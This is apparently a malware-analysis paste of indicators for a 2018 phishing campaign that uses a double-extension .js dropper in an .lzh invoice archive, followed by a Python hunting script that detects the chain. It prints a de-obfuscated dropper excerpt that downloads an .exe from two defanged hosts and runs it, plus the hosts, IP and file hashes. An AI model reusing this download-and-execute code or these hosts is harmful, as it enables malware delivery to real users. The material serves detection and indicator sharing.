#js_111018

VRad, Oct 11th, 2018 (edited)
#IOC #OptiData #VR #? #lzh #js #WSH

https://pastebin.com/MP3kCSSh
https://radetskiy.wordpress.com/?s=WSH

scheme
--------------
email attachment (.lzh archive) > .js inside it > WScript.exe (WSH) > GET dwrite.exe from one of 2 URLs > dropped as %templates%\<random number>.exe and executed
  9.  
email_headers
--------------
n/a

email_subjects
--------------
"рахунки ТОВ Заря. оплатить до конца недели"  (translation: "invoices LLC Zarya. pay by the end of the week")
"Рахунки Богданова за 10е"  (translation: "Bogdanova's invoices for the 10th")
  18.  
files
--------------
SHA-256 a146baacebf4889c153bb28e37b013d09730265e3fa70f5542d9a878cf103ac2
File name   Рахунки до оплати ТОВ СМБ.lzh  (translation: "Invoices for payment LLC SMB")  LHarc 1.x/ARX archive data [lh0]
File size   86.76 KB

SHA-256 241851549298ad7fe353c62a6f8e9fa2fdf50a1fb2160bc72588904fe49522c3
File name   QoC5kb2N4?= [CLEAN]
File size   5.73 KB

SHA-256 d6995bdfa7e95b5bb1d64931cbeedfb48a5c9b3d76494a1b2d4121fa7a6e25d0
File name   Pax. 00295 10.10.2018p.xls.js  (double extension: looks like an .xls invoice, the real extension is .js)
File size   80.94 KB

SHA-256 d3a9a5b6f02b8df627d0e792fdd15761a9cefd12f5464466eca30ac90b7b911e
File name   82371Equipmentthe (served as dwrite.exe)  PE executable, DOS stub "This program cannot be run in DOS mode"
File size   428 KB
  36.  
script
--------------
// excerpt of the de-obfuscated .js dropper; only the relevant statements are kept,
// URLs are defanged with {.}, and the XMLHTTP object behind HTTP is created elsewhere in the script
var wsh = new ActiveXObject("wscript.shell");
// drop path: %templates%\<random 4-7 digit number>.exe (see the 658656.exe in proc below)
var path = wsh.SpecialFolders("templates")+"\\"+((Math.random()*999999)+9999|0)+".exe";
// first download URL, synchronous GET
HTTP.Open("GET", "http://sfbotvinnik{.} icu/folua/dwrite.exe", false); HTTP.Send();
// fallback: second URL is tried when the first download fails
else
{ HTTP.Open("GET", "http://centurionsix{.} website/folua/dwrite.exe", false);
  44.  
activity
**************

proc
--------------
"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Pax. 00295 10.10.2018p.xls.js"
"C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\658656.exe"

netwrk
--------------
93.179.68.94    sfbotvinnik{.} icu  GET /folua/dwrite.exe HTTP/1.1  Mozilla/4.0

comp
--------------
wscript.exe 2204    93.179.68.94    80  ESTABLISHED

persist
--------------
n/a
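The chain above (WScript.exe started on a double-extension .js, the dropped binary in the Templates folder, wscript.exe itself fetching an .exe over HTTP) can be turned into a hunting check. The following is an added example written for this page, not the author's tooling; the event tuples are constructed to mirror the proc/netwrk/comp lines of this paste, and their field layout is an assumption of the example rather than any real EDR or Sysmon schema. The 4-7 digit filename range follows from the script's own `(Math.random()*999999)+9999|0` expression (minimum 9999, maximum 1009997).

```python
import ntpath
import re

# Constructed sample events modelled on the proc / netwrk / comp lines of this paste.
# Layout (assumed for this example): (pid, image, cmdline)
PROC_EVENTS = [
    (2204, r"C:\Windows\System32\WScript.exe",
     r'"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Pax. 00295 10.10.2018p.xls.js"'),
    (3120, r"C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\658656.exe",
     r'"C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\658656.exe"'),
    # constructed benign-looking WSH launch: no double extension, should not fire
    (4400, r"C:\Windows\System32\WScript.exe",
     r'"C:\Windows\System32\WScript.exe" "C:\Users\operator\logon.js"'),
    # constructed unrelated process
    (5012, r"C:\Program Files\Editor\editor.exe",
     r'"C:\Program Files\Editor\editor.exe" "C:\Users\operator\Desktop\report.xls"'),
]
# Layout (assumed): (pid, image_basename, dst_ip, dst_port, host, uri, user_agent)
NET_EVENTS = [
    (2204, "wscript.exe", "93.179.68.94", 80, "sfbotvinnik.icu", "/folua/dwrite.exe", "Mozilla/4.0"),
    (5012, "editor.exe", "203.0.113.5", 443, "updates.example.net", "/check", "Editor/1.0"),  # constructed
]

# Indicators taken from this paste (defang removed so they compare against log fields).
IOC_HOSTS = {"sfbotvinnik.icu", "centurionsix.website"}
IOC_IPS = {"93.179.68.94"}

WSH_HOSTS = {"wscript.exe", "cscript.exe"}
# Document-looking name that really ends in a WSH script extension, e.g. "....xls.js".
DOUBLE_EXT = re.compile(r"\.(xls|xlsx|doc|docx|pdf|rtf)\.(js|jse|vbs|vbe|wsf)$", re.I)
# %templates%\<n>.exe where n = (Math.random()*999999)+9999|0, i.e. 4..7 decimal digits.
TEMPLATES_EXE = re.compile(r"\\Microsoft\\Windows\\Templates\\\d{4,7}\.exe$", re.I)


def script_arg(cmdline):
    """Return the script path passed to a WSH host, or None if this is not a WSH launch."""
    # split on quoted or bare tokens (good enough for the cmdlines in this example)
    tokens = [q or bare for q, bare in re.findall(r'"([^"]+)"|(\S+)', cmdline)]
    if len(tokens) < 2 or ntpath.basename(tokens[0]).lower() not in WSH_HOSTS:
        return None
    return tokens[1]


def check_process(pid, image, cmdline):
    """Rules over a process-creation event; returns the list of rule names that fired."""
    hits = []
    script = script_arg(cmdline)
    if script and DOUBLE_EXT.search(script):
        hits.append("wsh_double_extension")
    if TEMPLATES_EXE.search(image):
        hits.append("templates_random_exe")
    return hits


def check_network(pid, image, ip, port, host, uri, ua):
    """Rules over an outbound connection event; returns the list of rule names that fired."""
    hits = []
    if image.lower() in WSH_HOSTS:
        hits.append("wsh_outbound")          # a script host talking to the internet at all
        if uri.lower().endswith(".exe"):
            hits.append("wsh_exe_download")  # ... and pulling a PE, as in the netwrk line above
    if host.lower() in IOC_HOSTS or ip in IOC_IPS:
        hits.append("known_ioc")
    return hits


def hunt(proc_events, net_events):
    """Correlate both event types by pid; returns {pid: [rule, ...]} for pids with any hit."""
    findings = {}
    for pid, image, cmdline in proc_events:
        hits = check_process(pid, image, cmdline)
        if hits:
            findings.setdefault(pid, []).extend(hits)
    for ev in net_events:
        hits = check_network(*ev)
        if hits:
            findings.setdefault(ev[0], []).extend(hits)
    return findings


if __name__ == "__main__":
    for pid, rules in sorted(hunt(PROC_EVENTS, NET_EVENTS).items()):
        print(pid, ", ".join(rules))
```

The pid 2204 correlation (double-extension script plus an .exe fetched by wscript.exe from a listed host) is the strong signal; `templates_random_exe` on its own is weaker, so in a real deployment it is best joined to a parent-process field, which this paste does not record.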
  64.  
# # #
https://www.virustotal.com/#/file/a146baacebf4889c153bb28e37b013d09730265e3fa70f5542d9a878cf103ac2/details
https://www.virustotal.com/#/file/241851549298ad7fe353c62a6f8e9fa2fdf50a1fb2160bc72588904fe49522c3/details
https://www.virustotal.com/#/file/d6995bdfa7e95b5bb1d64931cbeedfb48a5c9b3d76494a1b2d4121fa7a6e25d0/community
https://www.virustotal.com/#/file/d3a9a5b6f02b8df627d0e792fdd15761a9cefd12f5464466eca30ac90b7b911e/detection
https://analyze.intezer.com/#/analyses/a8fa2a81-4187-4b98-bfc9-4b322edf31bc